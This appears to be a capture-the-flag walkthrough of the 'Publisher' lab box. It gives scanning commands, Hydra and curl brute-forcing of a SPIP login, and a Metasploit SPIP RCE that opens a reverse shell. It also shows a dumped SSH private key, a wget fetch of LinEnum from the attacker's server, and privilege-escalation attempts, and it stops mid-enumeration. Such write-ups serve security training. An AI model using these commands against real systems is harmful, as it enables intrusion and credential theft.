PUBLISHER.




SCANNING: PORTS:
Quick nmap scan:
nmap -sS -T4 -sV 10.10.227.29
OUTPUT:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel




EXPLORING: WEBSITE (http://10.10.227.29/):
Nothing really eyecatching or interesting.




SCANNING: WEB DIRECTORIES:
Quick basic gobuster directory scan:
gobuster dir -u http://10.10.227.29/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
OUTPUT:
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/images               (Status: 301) [Size: 313] [--> http://10.10.227.29/images/]
/index.html           (Status: 200) [Size: 8686]
/server-status        (Status: 403) [Size: 277]


Note:
We got no useful directories, so we will run a longer wordlist.
Bigger gobuster directory scan:
gobuster -u http://10.10.227.29/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
OUTPUT:
/images               (Status: 301) [Size: 313] [--> http://10.10.227.29/images/]
/server-status        (Status: 403) [Size: 277]
Progress: 7952 / 30000 (26.51%)[ERROR] Get "http://10.10.227.29/userads": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 8202 / 30000 (27.34%)[ERROR] Get "http://10.10.227.29/_mem_bin": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/spip                 (Status: 301) [Size: 311] [--> http://10.10.227.29/spip/]
Progress: 23974 / 30000 (79.91%)[ERROR] parse "http://10.10.227.29/error\x1f_log": net/url: invalid control character in URL
Progress: 29999 / 30000 (100.00%)
Note:
We found a new directory: /spip


Visiting (http://10.10.227.29/spip/):
We find a page for article browsing, which has some buttons that redirect:
1. http://10.10.227.29/spip/spip.php?article1:
-> We can leave messages.
-> Another redirect (http://10.10.227.29/spip/spip.php?auteur1): we can send private messages.
2. http://10.10.227.29/spip/spip.php?page=plan:
-> Has a searchbar.
3. http://10.10.227.29/spip/spip.php?page=login&url=.%2F&lang=fr:
-> Login portal: asks for login/email and password.
4. http://10.10.227.29/spip/spip.php?page=contact:
-> Another contact form.
5. http://10.10.227.29/spip/spip.php?page=backend:
-> Lots of french text. Translation:
What is an RSS feed?
An RSS feed collects information about updates to a site. It provides the content of posts or comments, or an extract from them, as well as a link to the full versions and some other information. This feed is intended to be read by an RSS aggregator.
Subscribe
Copy the following URL into your aggregator: 
http://10.10.227.29/spip/spip.php?page=backend



SCANNING: WEB FILES:
Gobuster file scan: 
gobuster dir -u http://10.10.227.29/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -x php,txt,bak,zip
Note:
No relevant output.


BRUTEFORCING: LOGIN PORTAL:
If we try default credential pair (admin, admin).
OUTPUT (translated):
There is 1 error in your entry, please check the information.	
Password error.
Note:
This means user admin exists. We now just need to bruteforce his password.


Find post request format:
Steps:
1. Open inspector tools CTRL + I
2. > Network
3. Try random login.
4. Click the request on the side bar.
5. > Payload
6. Check Form Data values.
OUTPUT:
var_login
test
password
test
Note:
Now we know that we need to set: var_login=^USER^&pass=^PASS^ as post fieldnames.


Find error login message:
Steps:
1. Open inspector tools CTRL + I
2. > Network
3. Try random password with user admin.
4. Click the request on the side bar.
5. > Response.
OUTPUT:
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<title>Publisher</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="none" />
<meta name="viewport" content="width=device-width" />
<script type="text/javascript">/* <![CDATA[ */
var mediabox_settings={"auto_detect":true,"ns":"box","tt_img":true,"sel_g":"#documents_portfolio a[type='image\/jpeg'],#documents_portfolio a[type='image\/png'],#documents_portfolio a[type='image\/gif']","sel_c":".mediabox","str_ssStart":"Diaporama","str_ssStop":"Arr\u00eater","str_cur":"{current}\/{total}","str_prev":"Pr\u00e9c\u00e9dent","str_next":"Suivant","str_close":"Fermer","str_loading":"Chargement\u2026","str_petc":"Taper \u2019Echap\u2019 pour fermer","str_dialTitDef":"Boite de dialogue","str_dialTitMed":"Affichage d\u2019un media","splash_url":"","lity":{"skin":"_simple-dark","maxWidth":"90%","maxHeight":"90%","minWidth":"400px","minHeight":"","slideshow_speed":"2500","opacite":"0.9","defaultCaptionState":"expanded"}};
/* ]]> */</script>
<!-- insert_head_css -->
<link rel='stylesheet' href='local/cache-css/dc46296a5b715f84d15a9a33cb6f133a.css?1753006215' type='text/css' />







<script type='text/javascript' src='local/cache-js/f0bb98b15d0f5a9074c9e24d98a23da8.js?1753006208'></script>










<!-- insert_head -->






<meta name="generator" content="SPIP 4.2.0" />
<style type='text/css'>:root {--spip-login-color-theme--hs: 338, 80%;--spip-login-color-theme--l: 10%;}
</style>
</head>
<body class="page_login sans_fond">

	<h1>Publisher</h1>
	

	<div class='formulaire_spip formulaire_login'>
	
	
	<p class='reponse_formulaire reponse_formulaire_erreur' role="alert">Il y a 1 erreur dans votre saisie, veuillez vérifier les informations.</p>

	

	 
	<form id='formulaire_login' method='post' action='/spip/spip.php?page=login&amp;url=spip.php%3Fpage%3Dcontact&amp;lang=fr'>
	
	<span class="form-hidden"><input name="page" value="login" type="hidden"
/><input name="url" value="spip.php?page=contact" type="hidden"
/><input name="lang" value="fr" type="hidden"
/><input name='formulaire_action' type='hidden'
		value='login' /><input name='formulaire_action_args' type='hidden'
		value='EO1OsIc6t3ug+A9rdlWJPGASbVXPNUoJb9lwmZU3zFGjJWLgbSckeQJiJ7KS4iA3K+e8su7Znxab1Cv/yJkUuYgWSxNJhF+So/EwoytSubkNapUkzQ1jyGshXB3MsL0SzYXVS0Y=' /><input name='formulaire_action_sign' type='hidden'
		value='' /></span>
	<fieldset>
		<legend>Identifiants personnels</legend>
		<div class="editer-groupe">
			<div class="editer editer_login obligatoire">
				<label for="var_login">Login ou adresse email : <span class="etoile" title="(obligatoire)" aria-label="(obligatoire)">*</span></label><input type='text' class='text' name='var_login' id='var_login' value="admin" size='40'  required='required'  autocapitalize="off" autocorrect="off" />
				<span id="spip_logo_auteur"></span>
			</div>
			<div class="editer editer_password obligatoire erreur">
				<label for="password">Mot de passe :  <span class="etoile" title="(obligatoire)" aria-label="(obligatoire)">*</span></label>
				<span class="erreur_message"><span role='alert'>Erreur de mot de passe.</span></span>
				<input type='password' class='text password' name='password' id='password' value="" size='40' autocapitalize="off" autocorrect="off"    autofocus='autofocus'/>
				<p class='details'><a href="spip.php?page=spip_pass&amp;lang=fr" id='spip_pass'>mot de passe oublié ?</a></p>
			</div>
			 
			<div class="editer editer_session"><div class='choix'>
				<input type="checkbox" class="checkbox" name="session_remember" id="session_remember" value="oui"  onchange="jQuery(this).addClass('modifie');" />
				<label class='nofx' for="session_remember">Se souvenir de moi</label>
			</div></div>
		</div>
	</fieldset>
	<p class="boutons"><input type="submit" class="btn submit" value="Se connecter" /></p>
	</form>
	
	
	
</div>
<script type="text/javascript">/*<![CDATA[*/var login_info;

function informe_auteur(c){
	login_info.informe_auteur_en_cours = false;
	// JSON envoye par informer_auteur.html
	c = jQuery.parseJSON(c);
	if (c) {
		// indiquer le cnx si on n'y a pas touche
		jQuery('input#session_remember:not(.modifie)')
		.prop('checked',(c.cnx=='1')?true:false);
	}
	if (c.logo)
		jQuery('#spip_logo_auteur').html(c.logo);
	else
		jQuery('#spip_logo_auteur').html('');
}

function actualise_auteur(){
	if (login_info.login != jQuery('#var_login').prop('value')) {
		login_info.informe_auteur_en_cours = true;
		login_info.login = jQuery('#var_login').prop('value');
		var currentTime = new Date();// on passe la date en var pour empecher la mise en cache de cette requete (bug avec FF3 & IE7)
		jQuery.get(login_info.page_auteur, {var_login:login_info.login,var_compteur:currentTime.getTime()},informe_auteur);
	}
}

var login_info={'login':'admin','page_auteur': 'spip.php?page=informer_auteur','informe_auteur_en_cours':false,'attente_informe':0};jQuery(function(){jQuery('#var_login').change(actualise_auteur);});/*]]>*/</script>	<p class="retour">
		
		<a href="http://192.168.152.130:8000/">retour au site public</a>
	</p>
	<p class="generator">
		<a href="https://www.spip.net/" title="Site réalisé avec SPIP"><svg class="logo_spip" viewBox="0 -1 200 154" xmlns="http://www.w3.org/2000/svg" width="60" height="40" focusable='false' aria-hidden='true'>
  <path class="letter_s" d="M85.9 108c-6.2-24.8-32-22.2-36.1-38.9-2.9-11.8 5-20.8 16.8-23.8A22.1 22.1 0 0188.4 52l.1.1.5.6.3.4.3.5.1.1c1.1 1.4 1.7 2.4 2.6 2.2.8-.2 1.2-2 1.4-3.3a46.9 46.9 0 00-58-51.4A47.4 47.4 0 001.4 58.3c8.3 33.9 40.2 39.6 57.5 48.2a14 14 0 01-2.7 26.3H56l-.7.2c-1.5.4-1.9.2-1.9.8 0 .4 1 .9 1.6 1.2a23 23 0 0030.9-27z" fill="currentColor"/>
  <path class="letter_p letter_p1" d="M132.6 116.6c3.9-19.2-12.6-19.2-18.7-18.3l-1.6.3c-5 .8-5.7 1-6.8.6a3 3 0 01-.8-.4l-.7-.5c-1.6-.9-3.5-.7-3.5-.7h-.3.1c-1.2 0-2.5 1-2.7 2.2l-15.5 49.8s-1 2.8 2 2.8h.9s7.9.7 11.9-10.7l10.6-34.8h4c9.2-.2 10.4 10.9 5.4 18.5-2.9 4.4-5.7 5.5-8.7 6.7l-2.5.8s-2.6.5-2.6 1.4c0 .7.9 1.2 2 1.5 1.4.2 3 .4 4.7.4 7.6 0 20.7-5.6 22.8-19.4.1-.6-.1.5 0-.2" fill="currentColor"/>
  <path class="letter_i" d="M154 97.8h-1.7c-2.5 0-4.2.7-5.4 1.4l-.3.2c-2 1.3-2.8 3.6-2.8 3.6l-10 32c-.3 1.2.5 2.2 1.8 2.2h6.6c1.2 0 2.5-1 2.7-2.2l10.9-35c.2-1.3-.6-2.2-1.8-2.2" fill="currentColor"/>
  <path class="letter_i letter_i_dot" d="M148 94h7.3c2.1-.2 3.2-2.5 3.1-3.6 0-1.1-1.1-2-3.4-2-2.3.1-7 1.4-7.2 5.2l.2.4" fill="currentColor"/>
  <path class="letter_p letter_p2" d="M199.4 116.6c3.9-19.2-12.6-19.2-18.7-18.3l-1.6.3c-5 .8-5.7 1-6.8.6a3 3 0 01-.8-.4l-.7-.5c-1.6-.9-3.5-.7-3.5-.7h-.3.1c-1.2 0-2.5 1-2.7 2.2l-15.5 49.8s-1 2.8 2 2.8h.9s7.9.7 11.9-10.7l9.6-31.7c-1.6-.5-2.6-1-3.5-1.6-2-1.4-2.1-2.8-.6-2.3 1.4.5 3.1.9 9.2.8 9.2-.2 10.4 10.9 5.4 18.5-2.9 4.4-5.7 5.5-8.7 6.7l-2.5.8s-2.6.5-2.6 1.4c0 .7.9 1.2 2 1.5 1.4.2 3 .4 4.7.4 7.6 0 20.7-5.6 22.8-19.4 0-.6-.2.5-.1-.2" fill="currentColor"/>
Note:
Key line: <span class="erreur_message"><span role='alert'>Erreur de mot de passe.</span></span>
Our error message will be: Erreur de mot de passe.


Hydra bruteforce:
hydra -l admin -P ~/thm/rockyou.txt 10.10.227.29 http-post-form \
"/spip/spip.php?page=login&url=spip.php%%3Fpage%%3Dcontact&lang=fr:var_login=^USER^&pass=^PASS^:Erreur de mot de passe."
OUTPUT:
[80][http-post-form] host: 10.10.227.29   login: admin   password: 123456789
[80][http-post-form] host: 10.10.227.29   login: admin   password: 12345
[80][http-post-form] host: 10.10.227.29   login: admin   password: 123456
[80][http-post-form] host: 10.10.227.29   login: admin   password: princess
[80][http-post-form] host: 10.10.227.29   login: admin   password: iloveyou
[80][http-post-form] host: 10.10.227.29   login: admin   password: rockyou
[80][http-post-form] host: 10.10.227.29   login: admin   password: 1234567
[80][http-post-form] host: 10.10.227.29   login: admin   password: 12345678
[80][http-post-form] host: 10.10.227.29   login: admin   password: abc123
[80][http-post-form] host: 10.10.227.29   login: admin   password: nicole
[80][http-post-form] host: 10.10.227.29   login: admin   password: babygirl
[80][http-post-form] host: 10.10.227.29   login: admin   password: password
[80][http-post-form] host: 10.10.227.29   login: admin   password: daniel
[80][http-post-form] host: 10.10.227.29   login: admin   password: lovely
[80][http-post-form] host: 10.10.227.29   login: admin   password: jessica
[80][http-post-form] host: 10.10.227.29   login: admin   password: monkey
Note:
Something is wrong with our script, since it found 16 valid passwords.


Note:
We don't need to fix the hydra command, we can just try each password with a script.
Script:
#!/bin/bash

URL="http://10.10.227.29/spip/spip.php?page=login&url=spip.php%3Fpage%3Dcontact&lang=fr"
USERNAME="admin"
PASSWORDS_FILE="candidate_passwords.txt"

for password in $(cat $PASSWORDS_FILE); do
  echo "[*] Trying password: $password"

  response=$(curl -s -X POST "$URL" \
    -d "var_login=$USERNAME&pass=$password" \
    | grep -i "Erreur de mot de passe.")

  if [ -z "$response" ]; then
    echo "[+] SUCCESS! Password is: $password"
    break
  fi
done
Note:
We save the script as auto_user_try.sh
We also create a file with each password per line, all_passwords.txt


Make script executable:
chmod +x auto_user_try.sh


Run script:
./auto_user_try.sh
OUTPUT:
[*] Trying password: 123456789
[+] SUCCESS! Password is: 123456789
Note:
We will need to retry with hydra since this password didn't work.


Find response length when login is wrong:
curl -s -X POST "http://10.10.227.29/spip/spip.php?page=login&url=spip.php%3Fpage%3Dcontact&lang=fr" \
-d "var_login=admin&pass=wrongpassword" | wc -c
OUTPUT:
6749


Run hydra with 6749 as failure length (with -m):
hydra -l admin -P ~/thm/rockyou.txt 10.10.227.29 http-post-form \
"/spip/spip.php?page=login&url=spip.php%%3Fpage%%3Dcontact&lang=fr:var_login=^USER^&pass=^PASS^:s=6749"
Note:
We get the same multi-password output.
Since we are getting nowhere, we will explore other options.




RSS FEED (http://10.10.227.29/spip/spip.php?page=backend):
Note:
Taking a look at the link, it might be lfi vunlerable. 
Try link:
http://10.10.227.29/spip/spip.php?page=../../../../etc/passwd
OUTPUT:
Access forbidden.


Test xss payloads on page parameter:
http://10.10.227.29/spip/spip.php?page=%3Cscript%3Ealert(1)%3C/script%3E
OUTPUT:
Error 403
You are not authorized to view this page (xsspage)




BRUTEFORCING: LOGIN:
Note:
As shown before, a wrong login produces 2 error messages. so we will use the other one this time around.
Hydra retry:
hydra -l admin -P ~/thm/rockyou.txt 10.10.227.29 http-post-form \
"/spip/spip.php?page=login&url=spip.php%%3Fpage%%3Dcontact&lang=fr:var_login=^USER^&pass=^PASS^:Il y a 1 erreur dans votre saisie, veuillez vérifier les informations."
Note:
Same 16 password output.




SPIP EXPLOIT:
Note:
We want to find running version.
Visiting (view-source:http://10.10.227.29/spip/spip.php?page=login&lang=en):
CTR + U
OUTPUT (SNIPPET):
<meta name="generator" content="SPIP 4.2.0" />
Note:
SPIP, v4.2.0


Doing some research on that version, we find:
https://www.rapid7.com/db/modules/exploit/multi/http/spip_rce_form/


Run metasploit:
msfconsole


Look for spip related exploits:
search spip
OUTPUT:
Matching Modules
================

   #   Name                                             Disclosure Date  Rank       Check  Description
   -   ----                                             ---------------  ----       -----  -----------
   0   exploit/multi/http/spip_bigup_unauth_rce         2024-09-06       excellent  Yes    SPIP BigUp Plugin Unauthenticated RCE
   1     \_ target: PHP In-Memory                       .                .          .      .
   2     \_ target: Unix/Linux Command Shell            .                .          .      .
   3     \_ target: Windows Command Shell               .                .          .      .
   4   exploit/multi/http/spip_porte_plume_previsu_rce  2024-08-16       excellent  Yes    SPIP Unauthenticated RCE via porte_plume Plugin
   5     \_ target: PHP In-Memory                       .                .          .      .
   6     \_ target: Unix/Linux Command Shell            .                .          .      .
   7     \_ target: Windows Command Shell               .                .          .      .
   8   exploit/multi/http/spip_connect_exec             2012-07-04       excellent  Yes    SPIP connect Parameter PHP Injection
   9     \_ target: PHP In-Memory                       .                .          .      .
   10    \_ target: Unix/Linux Command Shell            .                .          .      .
   11    \_ target: Windows Command Shell               .                .          .      .
   12  exploit/multi/http/spip_rce_form                 2023-02-27       excellent  Yes    SPIP form PHP Injection
   13    \_ target: PHP In-Memory                       .                .          .      .
   14    \_ target: Unix/Linux Command Shell            .                .          .      .
   15    \_ target: Windows Command Shell               .                .          .      .


Interact with a module by name or index. For example info 15, use 15 or use exploit/multi/http/spip_rce_form
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'


We want to use module 0:
use 0


Note:
We set targeturi as /spip due to it being the most likely location.
Entering settings:
set RHOSTS COMPLETAR
set TARGETURI /spip
set LHOST 10.23.25.109

Note:
New ip (10.10.179.92) due to machine reboot.
Run exploit:
exploit
OUTPUT:
[*] Started reverse TCP handler on 10.23.25.109:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] SPIP version 4.2.0 is vulnerable.
[*] Bigup plugin version detected: 3.2.1
[+] The target appears to be vulnerable. Both the detected SPIP version (4.2.0) and bigup version (3.2.1) are vulnerable.
[*] Found formulaire_action: login
[*] Found formulaire_action_args: EKNEtIY6tz6eh7bn+rb23...
[*] Preparing to send exploit payload to the target...
[*] Sending stage (40004 bytes) to 10.10.179.92
[*] Meterpreter session 1 opened (10.23.25.109:4444 -> 10.10.179.92:38720) at 2025-07-20 16:56:28 +0200

meterpreter > 


Run a shell:
shell
OUTPUT:
Process 16 created.
Channel 0 created.




USER FLAG:
Find user flag:
find / -name user.txt 2>/dev/null
OUTPUT:
/home/think/user.txt


Check user flag:
cat /home/think/user.txt
OUTPUT:
fa229046d44eda6a3598c73ad96f4ca5  




PRIVESC:
Set term (to be able to run clear):
export TERM=xterm


Check sudo permissions:
sudo -l
/bin/sh: 11: sudo: not found


Check sudo binaries:
find / -perm -4000 -type f 2>/dev/null
OUTPUT:
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/umount


Note:
It would be great to privesc doing sudo su, but it will probably fail again.
Privesc via su:
sudo su
/bin/sh: 19: sudo: not found


Note:
Since /bin/sh isn't found, we need to search for a user that has it.
Check /etc/passwd:
cat /etc/passwd
OUTPUT:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
think:x:1000:1000::/home/think:/bin/sh
Note:
We need to log in as think.


Check shadow:
cat /etc/shadow
OUTPUT:
cat: /etc/shadow: Permission denied


Check his home directory:
ls /home/think
OUTPUT:
spip
user.txt


Note:
We need to use -a for hidden files to be displayed. We also add ssh sudirectory.
Ssh listing:
ls -la /home/think/.ssh
OUTPUT:
drwxr-xr-x 2 think think 4096 Jan 10  2024 .
drwxr-xr-x 8 think think 4096 Feb 10  2024 ..
-rw-r--r-- 1 root  root   569 Jan 10  2024 authorized_keys
-rw-r--r-- 1 think think 2602 Jan 10  2024 id_rsa
-rw-r--r-- 1 think think  569 Jan 10  2024 id_rsa.pub
Note:
We got a key


Check the key and copy paste to attacker:
cat /home/think/.ssh/id_rsa
OUTPUT:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----


Note:
We paste to file think_id_rsa
Give key restricted permissions:
chmod 600 think_id_rsa


Ssh as think:
ssh -i think_id_rsa think@10.10.179.92
OUTPUT:
think@ip-10-10-179-92:~$


Note:
Now that sudo works, we try su suid privesc:
sudo su:
OUTPUT:
[sudo] password for think: 
Note:
We don't know think's password.


Check suid binaries:
find / -perm -4000 -type f 2>/dev/null
OUTPUT:
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
/usr/sbin/run_container
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount


Try pkexec:
pkexec /bin/bash
OUTPUT:
The value for the SHELL variable was not found the /etc/shells file


Try at:
echo "/bin/bash" | at now
OUTPUT:


List real users:
awk -F: '$6 ~ /^\/home/ && system("[ -d "$6" ]") == 0 { print $1 }' /etc/passwd
OUTPUT:
think ubuntu


Note:
No clear privesc vector, we will try to scripts.
Server setup (as attacker. Run from file where LinEnum.sh is stored):
python3 -m http.server 8000

Download (machine):
wget http://10.23.25.109:8000/LinEnum.sh -O /var/tmp/LinEnum.sh


Make script executable:
cd /var/tmp
chmod +x LinEnum.sh


Run script:
./LinEnum.sh
Note:
Noting eyecatching.


Taking a look back at our suid binaries, we check if run_container can run any interesting commands:
strings /usr/sbin/run_container | grep -E '/bin/|/usr/bin/|sh|bash|cp|rm|cat|tar|find|python|perl|env|nano|vi|less|wget|curl|sudo|pkexec|docker'
OUTPUT:
__libc_start_main
__gmon_start__
/bin/bash
/opt/run_container.sh
__init_array_start
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__bss_start
.shstrtab
.gnu.hash
Note:
It can run /bin/bash and /opt/run_container.sh. This means the script is executed as root.


Check if the script is writeable by think:
ls -l /opt/run_container.sh
OUTPUT:
-rwxrwxrwx 1 root root 1715 Jan 10  2024 /opt/run_container.sh
Note:
We could rewrite the script to privesc like so:
echo '#!/bin/bash' > /opt/run_container.sh
echo 'bash -p' >> /opt/run_container.sh
chmod +x /opt/run_container.sh
But we would get an error, since think cant run /bin/bash.


Check script attributes (like permissions, but more granulate):
lsattr /opt/run_container.sh
OUTPUT:
--------------e----- /opt/run_container.sh
Note:
This means writes are blocked (even though permissions allow it). A security service like AppArmor, SELinux or capabilities is restricting user think.


Read script:
cat /opt/run_container.sh
OUTPUT:
#!/bin/bash

# Function to list Docker containers
list_containers() {
    if [ -z "$(docker ps -aq)" ]; then
	docker run -d --restart always -p 8000:8000 -v /home/think:/home/think 4b5aec41d6ef;
    fi
    echo "List of Docker containers:"
    docker ps -a --format "ID: {{.ID}} | Name: {{.Names}} | Status: {{.Status}}"
    echo ""
}

# Function to prompt user for container ID
prompt_container_id() {
    read -p "Enter the ID of the container or leave blank to create a new one: " container_id
    validate_container_id "$container_id"
}

# Function to display options and perform actions
select_action() {
    echo ""
    echo "OPTIONS:"
    local container_id="$1"
    PS3="Choose an action for a container: "
    options=("Start Container" "Stop Container" "Restart Container" "Create Container" "Quit")

    select opt in "${options[@]}"; do
        case $REPLY in
            1) docker start "$container_id"; break ;;
            2) 	if [ $(docker ps -q | wc -l) -lt 2 ]; then
	            echo "No enough containers are currently running."
    	            exit 1
		fi
                docker stop "$container_id"
                break ;;
            3) docker restart "$container_id"; break ;;
            4) echo "Creating a new container..."
               docker run -d --restart always -p 80:80 -v /home/think:/home/think spip-image:latest 
               break ;;
            5) echo "Exiting..."; exit ;;
            *) echo "Invalid option. Please choose a valid option." ;;
        esac
    done
}

# Main script execution
list_containers
prompt_container_id  # Get the container ID from prompt_container_id function
select_action "$container_id"  # Pass the container ID to select_action function


Note:
Based on what we said before about security apps, we will try to read AppArmor policies.
Move into AppArmor directory:
cd /etc/apparmor.d


Check out restrictions and permissions:
ls -la
OUTPUT: 
rwxr-xr-x   8 root root  4096 Apr 27 13:23 .
drwxr-xr-x 132 root root 12288 Jul 20 14:55 ..
drwxr-xr-x   2 root root  4096 Apr 27 13:18 abi
drwxr-xr-x   4 root root 12288 Apr 27 13:18 abstractions
drwxr-xr-x   2 root root  4096 Feb 23  2022 disable
drwxr-xr-x   2 root root  4096 Feb 11  2020 force-complain
drwxr-xr-x   2 root root  4096 Apr 27 13:23 local
-rw-r--r--   1 root root  1313 May 19  2020 lsb_release
-rw-r--r--   1 root root  1108 May 19  2020 nvidia_modprobe
-rw-r--r--   1 root root  3500 Jan 31  2023 sbin.dhclient
drwxr-xr-x   5 root root  4096 Apr 27 13:18 tunables
